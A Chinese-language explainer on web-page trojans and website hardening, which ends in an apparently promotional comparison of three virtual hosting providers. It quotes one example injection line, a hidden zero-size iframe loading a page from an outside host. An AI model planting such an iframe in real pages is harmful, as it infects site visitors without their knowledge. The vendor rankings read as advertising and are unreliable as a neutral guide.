什么是网页病毒?
它主要是利用网站的安全漏洞,通过执行嵌入在网页HTML超文本标记语言内的Java Applet小应用程序,JavaScript脚本语言程序,ActiveX软件部件网络交互技术支持可自动执行的代码程序,以强行修改用户操作系统的注册表设置及系统实用配置程序,或非法控制系统资源盗取用户文件,或恶意删除硬盘文件、格式化硬盘为行为目标的非法恶意程序。现在流行的网页木马大多是:〈iframe src=http://www.haogs.com/mm.htm width=0 height=0> 这样的格式,通过隐藏在一些安全等级不高的网站内,只要浏览该网站的用户都可能中病毒和木马。这种非法恶意程序能够得以被自动执行,在于它完全不受用户的控制。你一旦浏览含有该病毒的网页,即可以在你不知不觉的情况下马上中招,给用户的系统带来一般性的、轻度性的、严重恶性等不同程度的破坏。令你苦不堪言,甚至损失惨重无法弥补。
网站被挂木马的主要原因
目前国内的大多数中小网站都是从网络上下载的免费系统建成的,如动网、动易、discuz等系统,这些系统在设计的时候存在或多或少的安全漏洞,如动网和动易以前都存在过上传漏洞,导致黑客可以上传木马至网站,轻易获得管理权限。同时Win2003本身也存在设计缺陷,如前段时间出现的新漏洞:“IIS6 目录检查漏洞”。加之很多网站管理员的安全水平有限,目前网页病毒木马非常猖獗。
如何提高网站安全
作为网站的管理员,显示有必要防止黑客入侵,以防止给网站的用户带来安全风险,同时可能发生资料泄露、文件被删除等严重问题。目前大多数网站都是以虚拟主机的形式托管的,要提高网站安全,需要从两方面入手。一方面,网站管理员应及时给自己的网站程序打上最新的补丁,在开发的时候应加强安全意识,注意防止注入漏洞、上传漏洞等问题。另一方面,将网站托管在技术实力强、安全系数高、能主动帮客户解决安全的服务商处也可以加强您的网站安全。
笔者比较了国内目前在虚拟主机安全方面做的比较好的三家公司,进行一些对比分析,希望能对您有所帮助:
1. 西部数码 http://www.west263.com
西部数码是西部地区最大的虚拟主机域名注册服务商,名列全国10强。主要提供智能多线虚拟主机、域名注册、主机租用等服务。
西部数码的虚拟主机在安全方面是做的最好的,其控制面板中有40余项管理功能,其中关于网站安全的有10项功能,如:FSO自由开通关闭、
Ado.Stream关闭、整个网站写入权限关闭,单独目录可放写入权限。对重要的管理目录如/admin/可以设置IP限制,即使黑客获得了管理员密码也无法登录;对重要的目录如/bbs/UploadFile 目录,可以关闭脚本执行权限,即使黑客通过漏洞上传了木马在里面也不能执行。
同时西部数码还独家提供 网页病毒木马在线查杀的功能,可以批量清除木马,及时发现隐藏的病毒。使用起来非常的方便。
2. 联动天下 http://www.72e.net/
联动天下是中国最早开始提供域名注册,网站空间,企业邮局和网站建设专业提供商之一,免费支持wap虚拟主机无线上网.
联动天下凭借其强大的技术开发能力,完成一套功能强大的网站安全过滤系统,能很好的解决IIS的目录检测漏洞。网站安全过滤系统主要有以下几个方面的功能:
网站安全检测功能 此安全过滤系统会对访问者请求的网址进行安全检测,当某个浏览者访问我司服务器上的网站时,安全系统先会检测此页面的网址是否是放在有目录安全隐患的文件夹中,如果是则自动中止页面的执行,有效的防止黑客利用这个漏洞入侵网站系统,彻底解决IIS的目录安全问题。
程序错误侦测 此安全过滤系统独有的网页程序错误检测功能,用户可以通过虚拟主机控制面板查看程序的出错情况,大大方便了程序优化、程序排错的工作,避免用户去分析那些羞涩难懂、并且海量的网站日志文件。
3. 三五互联 http://www.35.com
35互联是一家专业服务于全球中小企业和商务人士的互联网应用服务提供商(ASP),是中国首家获得ICANN认证和CNNIC首批认证的顶级域名注册服务机构.
三五互联的虚拟主机控制面板中也提供了很多关于网络安全方面的功能,如页面加密,ip地址限制(不能设置子目录)、文件保护功能可以防止重要文件如数据库被人下载。
当然国内还有其他一些公司也在主动加强网站安全方面有所突破,限于篇幅原因,不再介绍。大家在选购虚拟主机的时候,不要光看价格,找一家知名的品牌服务商,最好找能进行免费试用的主机,试用几天,一定能找到适合自己的虚拟主机产品。
只要网站管理员和虚拟主机服务商共同努力,一定能解决好目前网页木马病毒泛滥的问题。